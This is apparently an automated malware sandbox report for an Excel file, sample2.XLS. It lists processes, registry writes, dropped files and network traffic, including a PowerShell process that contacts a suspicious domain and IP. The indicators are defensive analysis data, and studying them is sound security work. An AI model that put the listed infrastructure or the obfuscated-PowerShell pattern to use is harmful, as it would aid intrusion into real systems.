Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
2932\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\WINDOWS\system32\conhost.exe
powErsHell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
3584"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\admin\Desktop\sample2.XLS"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
16.0.11328.20158
Modules
Images
c:\program files\microsoft office\root\office16\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\windows\system32\combase.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
Total events
2 106
Read events
1 831
Write events
243
Delete events
32

Modification events

(PID) Process:(3584) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:1
Value:
01E009000000001000BE4E402C02000000000000000400000000000000
(PID) Process:(3584) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
2
(PID) Process:(3584) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
1
(PID) Process:(3584) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:it-IT
Value:
1
(PID) Process:(3584) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
Operation:writeName:)c$
Value:
29632400000E0000010000000000000022B760FB763CD50100000000
(PID) Process:(3584) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
Operation:writeName:9c$
Value:
39632400000E00000000044001000000451B63FB763CD501BE0600001D79B334EEFFF448AC89FE068DB4E036451B63FB763CD5010000000000001000BE4E402C000000000600000002000000000000000000556E6B6E6F776E0000000000000000000000000000000000000000000000000000000000000000000DF0ADDE0DF0ADDE0DF0ADDE0DF0ADDE440045004600410055004C00540000005E0000000000AA0038EF9100B02CC704500000000000AA0048EF9100D007A2002000000068000000DC0BA200D007A200000000005800000098B0B7000000A20000000000882CC704B0A2C70400D1A200E401A20009000000200000000000A200D0A2C7040300000020000000FF3F0000140DA20000000000100DA200D007A20040EF9100A90D44775000000000000000270000000000AA00500000000000AA00D0EF9100000000000D0000000000A200A4B9CF04000000000B0000000200000000000000F7D82D0BC04BAE00040000001708CE5DF0F19100E8AEC704D607447707000000D607447700000000C9D1427750000000D0DACF0404000000C4EF910074EF91008CEF91008D2ADC5D3400000058F2910014F0910000000000F8FFFFFF20F2910034F291000029DC5D28F291000800000058F2910014F0910000000000E0F2910040000000B129DC5D28000000430000432400000000000000383AAC00F03EAC00902CAC00014BAE005E000000982CAC000000000007000000000000000000000000000000000000000000000000000000070000000000000058F291004300000008000000FFFFFFFF08000000D0F2910000000000000000004EDAE05D80F0910001000000E8AEC70400000000320000009CF1910020F1910028A7D10430A7D1045100005100000000782FB200E9009700181EC704440045004600410055004C00540000003CF09100000000000000DD5D00F091006002AA00600000008895AA0060000000200000000000AA00400000000000AA0068F191009CF1910044F19100D007A20000000000D007A2000000000048000000000000000000A20000000000701FC604282FCB0416D1A200DC01A2000000A200D4B2C7040000A200682FCB041C00000020000000442FCB046C09A200000000006809A200A90D447760F19100A90D44774000000000000000000000000000AA007818DD5DFFFFFFFF58F1910072EBCB5D01000000000000000500000000000000090000000200000000000000400000000000AA004800000000000000D607447784F19100D607447730000000D6074477000000000000000040000000400000000000AA00A4F19100234FDB5D0000AA000000000040000000200000000000AA0068F29100C0F19100FE46DB5D4000000024001C00D007A200C8F191002800000010F491000000A20000000000B02CC7045E0000000000AA00A0F29100B02CC704500000000000AA00B0F29100D007A2002000000068000000DC0BA200D007A200000000005800000098B0B7000000A20000000000882CC704B0A2C7041CD1A200E401A20016000000200000000000A200D0A2C7040900000020000000FF3F0000140DA20000000000100DA200D007A200A8F29100A90D44775000000000000000270000000000AA00440045004600410055004C00540000000D0000000000A200A4B9CF04000000000B0000000200000000000000B72A4477E56FDF56C80600000000AA00A8F49100F8B0C704D607447707000000D607447702000002000000002D5B087ED0DACF0426010027ECF29100234FDB5D0000AA0002000002500000002D5B087E26004477856FDF5628A6D1040000AA00306FB3001CF39100D607447707000000D6074477020000023B00000010A5FFFF3D000000F1FFFFFFD895B40451000051D8000000ADA5FFFF20F491002C87AA0080D643770000AA006F00000044A5FFFFF1FFFFFF782CC704B0A2C7043D0000009002AA000000A604100DA20071000000C000AA00BC95AA0001000000FF0700000000000000000000170100001403AA0060000000000000000000000060000060C055C90497000000D0060000320000000100000088F491003D000000181EC7046000600000000000DA000000170100000F0000000100000000000000D095B404D095B404A4010F01020000020000DD5D000000006002AA003D000000D895B4040200000068F491010000010071000000FEFFFFFF3D00000004F591026002AA0000000000000000001D0000003D0000003D000000102DB700F81CB70004F59100907349774DB31E21FEFFFFFFA0F49100070E4477C8060000D00600000498AA0084F4910038F591000000AA000000AA0000000000281EB70090F491000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(3584) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3584) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3584) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3584) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
0
Suspicious files
4
Text files
5
Unknown types
5

Dropped files

PID
Process
Filename
Type
3584EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFBAB28A1EBD66D486.TMP
MD5:
SHA256:
3584EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF9F7FAD2EFEC7CF08.TMP
MD5:
SHA256:
3584EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFFBDD964F06772CA5.TMP
MD5:
SHA256:
300powErsHell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ryg14jvq.1os.ps1
MD5:
SHA256:
300powErsHell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hzemd0xy.re1.psm1
MD5:
SHA256:
3584EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFC14294E119C60A57.TMP
MD5:
SHA256:
3584EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF43045BA7075E7D88.TMP
MD5:
SHA256:
3584EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFFB82929A953C79CB.TMP
MD5:
SHA256:
3584EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-shm
MD5:
SHA256:
3584EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
10
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D
US
der
1.47 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
40.90.23.213:443
login.live.com
Microsoft Corporation
US
unknown
3584
EXCEL.EXE
13.107.3.128:443
config.edge.skype.com
Microsoft Corporation
US
whitelisted
3584
EXCEL.EXE
52.114.88.20:443
self.events.data.microsoft.com
Microsoft Corporation
GB
whitelisted
300
powErsHell.exe
185.158.249.75:443
woeiuyfgowe.xyz
easystores GmbH
NL
suspicious
3584
EXCEL.EXE
52.109.32.27:443
officeclient.microsoft.com
Microsoft Corporation
GB
whitelisted
3584
EXCEL.EXE
52.109.124.20:443
nexusrules.officeapps.live.com
Microsoft Corporation
SG
whitelisted

DNS requests

Domain
IP
Reputation
login.live.com
  • 40.90.23.213
whitelisted
self.events.data.microsoft.com
  • 52.114.88.20
whitelisted
ocsp.digicert.com
  • 93.184.220.29
whitelisted
config.edge.skype.com
  • 13.107.3.128
malicious
woeiuyfgowe.xyz
  • 185.158.249.75
suspicious
nexusrules.officeapps.live.com
  • 52.109.124.20
whitelisted
officeclient.microsoft.com
  • 52.109.32.27
whitelisted

Threats

No threats detected
Process
Message
conhost.exe
InitSideBySide failed create an activation context. Error: 1814
conhost.exe
InitSideBySide failed create an activation context. Error: 1814
EXCEL.EXE
2019-07-17 08:12:23.854 T#1992 <E> [AriaSDK.PAL] PAL is already shutdown!
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
sample2.XLS